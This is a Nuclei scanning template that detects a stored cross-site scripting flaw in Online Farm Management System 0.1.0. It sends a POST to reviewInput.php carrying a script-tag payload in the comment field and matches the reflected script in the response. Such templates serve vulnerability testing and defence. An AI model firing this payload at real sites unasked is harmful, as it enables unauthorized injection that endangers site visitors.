id: onlinefarm-management-xss

info:
  name: Online Farm Management System 0.1.0 - Cross-Site Scripting
  author: arafatansari
  severity: high
  description: |
    Online Farm Management System 0.1.0 contains a cross-site scripting vulnerability via the review.php file.
  reference:
    - https://www.exploit-db.com/exploits/48673
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
  tags: onlinefarm,cms,xss,edb

http:
  - raw:
      - |
        POST /reviewInput.php?pid=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        comment=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&rating=0

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<em style="color: black;"><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# digest: 4a0a0047304502200405d24e2befa9eb7fb7a28c36255465a4857f607a8e9db0ab3b311859bf217c022100fbcd0c98f19bbbbc075fd6f4f4672174eb49fb2836f1a96e5af1ee5d9d532a90:922c64590222798bb761d5b6d8e72950
